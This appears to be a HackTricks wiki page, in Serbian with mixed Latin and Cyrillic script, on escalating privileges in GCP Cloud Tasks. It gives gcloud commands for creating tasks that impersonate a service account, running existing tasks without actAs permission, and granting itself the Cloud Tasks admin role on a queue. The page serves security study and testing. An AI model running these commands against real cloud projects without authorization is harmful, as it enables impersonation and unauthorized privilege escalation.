GCP - Cloud Tasks Privesc

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

Napadač sa ovim permisijama može impersonate other service accounts kreiranjem Cloud Tasks koji se izvršavaju pod identitetom specificiranog service account-a. Ovo omogućava slanje autentifikovanih HTTP zahteva ka IAM-zaštićenim Cloud Run ili Cloud Functions servisima.

Kreiraj Cloud Task sa service account impersonation ```bash gcloud tasks create-http-task \ task-$(date '+%Y%m%d%H%M%S') \ --location us-central1 \ --queue \ --url 'https://.us-central1.run.app' \ --method POST \ --header 'X-Hello: world' \ --body-content '{"hello":"world"}' \ --oidc-service-account-email @.iam.gserviceaccount.com ```

cloudtasks.tasks.run, cloudtasks.tasks.list

Napadač sa ovim dozvolama može pokretati postojeće zakazane zadatke bez dozvola na servisnom nalogu povezanom sa zadatkom. Ovo omogućava izvršavanje zadataka koji su prethodno kreirani pomoću servisnih naloga sa većim privilegijama.

Pokretanje postojećeg Cloud Task-a bez actAs dozvole ```bash gcloud tasks run projects//locations/us-central1/queues//tasks/ ```

Principал који извршава ову команду не мора да има iam.serviceAccounts.actAs дозволу на сервисном налогу задатка. Међутим, ово дозвољава само покретање постојећих задатака — не даје могућност креирања или измене задатака.

cloudtasks.queues.setIamPolicy

Нападач који има ову дозволу може да додели себи или другим принципалима Cloud Tasks улоге на одређеним редовима, потенцијално ескалирајући до roles/cloudtasks.admin која укључује могућност креирања и покретања задатака.

Dodeli Cloud Tasks administratorsku ulogu na redu ```bash gcloud tasks queues add-iam-policy-binding \ \ --location us-central1 \ --member serviceAccount:@.iam.gserviceaccount.com \ --role roles/cloudtasks.admin ```

Ovo omogućava napadaču da dodeli pune Cloud Tasks admin permissions na redu bilo kojem service account-u kojim upravlja.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks